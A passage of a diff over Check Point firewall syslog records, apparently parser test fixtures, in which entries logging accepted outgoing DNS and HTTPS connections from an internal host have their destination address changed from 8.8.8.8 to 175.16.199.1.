FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45748"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; 
ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39420"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54800"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49331"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52622"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38658"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; 
loguid:"{0x5e80ddf0,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48187"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51764"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; 
match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46662"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38829"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36823"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; 
loguid:"{0x5e80ddf0,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48187"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51764"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46662"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38829"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36823"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; 
loguid:"{0x5e80ddf0,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58776"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60950"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; 
match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53804"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51711"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43223"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; 
loguid:"{0x5e80ddf0,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40944"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53804"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51711"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43223"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40944"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; 
loguid:"{0x5e80ddf0,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38032"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x14,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50418"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503730"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; 
match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38708"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503730"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45599"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf2,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503730"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; 